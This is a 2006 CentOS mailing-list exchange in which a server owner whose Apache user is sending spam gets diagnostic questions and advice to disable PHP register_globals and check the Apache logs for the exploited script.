centos-bounces at centos.org <> scribbled on Thursday, June 22, 2006 12:21 PM: > Jason Bradley Nance wrote: >>> My question is why is this happening? Obviously it's some apache >>> exploit. >> >> I wouldn't jump to the conclusion that it's an Apache > exploit. It's >> more likely to be an issue with an insecure script assuming > they are >> even coming in through the web server. > > Meaning an insecure PHP form or the like? Any general words > of wisdom on how to ensure the my PHP forms are secure? I'm > more than happy to read up on this, but I just haven't found > any material that seems to describe my problem. > >> A few questions: >> >> 1) What makes you think this is an Apache issue? > > All the files are owned by user apache and the perl process > that is sending the spam is running as user apache. I know > this could be faked if the hacker has root access, but I > don't think that is the case. > >> 2) What other services are running on the box? > > I have three open ports, SSH, HTTPD and IMAP (running on a > nonstandard port) > >> 3) How did you clean up after the first hack? > > Killed the process removed the files. Used RPM to verify the > integrity of all the binaries on the system. > >> 4) Are you sure that a user account hasn't been cracked? > > Again I don't think so, but it's very hard to prove a > negative, that is it's very hard to prove that you haven't > been hacked. I check all the usual things such as the last > log, again if they have root they can hide this from me, but > I don't think that's the case. > >> 5) Do you allow root logins via ssh? > > Absolutely not. > > > http://lists.centos.org/mailman/listinfo/centos One thing I would make sure of is that register_globals = Off is set in /etc/php.ini Looking through your apache logs, as someone else suggested, should help you find which php script was exploited. Mike